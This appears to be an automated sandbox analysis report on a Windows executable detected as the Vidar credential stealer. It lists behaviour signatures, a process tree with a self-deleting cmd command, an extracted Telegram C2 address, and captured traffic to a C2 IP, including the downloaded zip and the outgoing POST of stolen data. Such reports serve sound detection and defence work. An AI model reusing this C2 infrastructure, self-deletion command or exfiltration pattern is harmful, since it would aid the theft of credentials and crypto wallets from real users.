Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:756295
MD5:5367709f0a96713b5c9a518e13f306d6
SHA1:244bdcc9a3548101cacc9c4f8912fb8631764b40
SHA256:2cc0be582a350f1eafb6d3c6cc713393098a6936346a9070ba55abd346dfb090
Tags:exe
Infos:

Detection

Vidar
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Vidar stealer
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Self deletion via cmd or bat file
Machine Learning detection for sample
Injects a PE file into a foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Uses a known web browser user agent for HTTP communication
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • file.exe (PID: 5884 cmdline: C:\Users\user\Desktop\file.exe MD5: 5367709F0A96713B5C9A518E13F306D6)
    • file.exe (PID: 5924 cmdline: C:\Users\user\Desktop\file.exe MD5: 5367709F0A96713B5C9A518E13F306D6)
      • file.exe (PID: 5896 cmdline: C:\Users\user\Desktop\file.exe MD5: 5367709F0A96713B5C9A518E13F306D6)
        • cmd.exe (PID: 5984 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\file.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 4656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • timeout.exe (PID: 3384 cmdline: timeout /t 6 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • cleanup
{"C2 url": "https://t.me/asifrazatg", "Botnet": "1148"}
SourceRuleDescriptionAuthorStrings
00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    00000000.00000002.231893309.000000000079A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000001.00000003.232045586.00000000004BC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          Process Memory Space: file.exe PID: 5896JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            1.3.file.exe.526a20.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              2.2.file.exe.400000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                2.2.file.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  1.3.file.exe.526a20.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                    0.2.file.exe.7fb280.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                      Click to see the 1 entries
                      No Sigma rule has matched
                      No Snort rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: file.exeReversingLabs: Detection: 32%
                      Source: file.exeVirustotal: Detection: 36%Perma Link
                      Source: file.exeJoe Sandbox ML: detected
                      Source: 00000000.00000002.231893309.000000000079A000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "https://t.me/asifrazatg", "Botnet": "1148"}
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040C670 __EH_prolog3_GS,_memset,lstrcat,lstrcat,lstrcat,CloseHandle,Sleep,OpenEventA,CreateEventA,_memset,lstrcat,lstrcat,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,Sleep,_memset,lstrcat,lstrcat,lstrcat,lstrcat,CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,_memset,CryptBinaryToStringA,CreateThread,CreateThread,Sleep,Sleep,_memset,_memset,2_2_0040C670
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040F7E5 CryptUnprotectData,LocalAlloc,_memmove,LocalFree,2_2_0040F7E5
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040FA24 _malloc,_memmove,_malloc,CryptUnprotectData,_memmove,2_2_0040FA24
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040F5CF _memset,lstrlenA,CryptStringToBinaryA,_memmove,lstrcat,lstrcat,2_2_0040F5CF
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040F78C CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,2_2_0040F78C
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49707 version: TLS 1.2
                      Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040C3ED wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_0040C3ED
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00412548 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00412548
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004135E2 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,_memset,_memset,_memset,_memset,_memset,_memset,FindNextFileA,FindClose,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,_memset,_memset,_memset,_memset,_memset,_memset,2_2_004135E2
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00409DF4 wsprintfA,FindFirstFileA,_memset,lstrcat,StrCmpCA,StrCmpCA,lstrcpy,lstrcat,lstrcat,_memset,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlenA,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,PathMatchSpecA,CoInitialize,PathMatchSpecA,lstrcpy,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,2_2_00409DF4
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00411603 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,GetFileAttributesA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_00411603
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040D624 _memset,lstrcat,wsprintfA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,GetFileAttributesA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_0040D624
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00417F60 __EH_prolog3_GS,FindFirstFileW,FindNextFileW,2_2_00417F60
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004118D3 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_004118D3
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00409284 __EH_prolog3_GS,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,_memset,lstrcat,lstrlenA,_memset,2_2_00409284
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004132B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,StrCmpCA,StrCmpCA,DeleteFileA,FindNextFileA,FindClose,2_2_004132B0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040A392 __EH_prolog3_GS,_memset,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,2_2_0040A392
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\Jump to behavior

                      Networking

                      barindex
                      Source: Malware configuration extractorURLs: https://t.me/asifrazatg
                      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: global trafficHTTP traffic detected: GET /1148 HTTP/1.1Host: 88.198.94.71
                      Source: global trafficHTTP traffic detected: GET /233910279258.zip HTTP/1.1Host: 88.198.94.71Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----4550768666964492Host: 88.198.94.71Content-Length: 110914Connection: Keep-AliveCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                      Source: global trafficHTTP traffic detected: GET /asifrazatg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0;x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707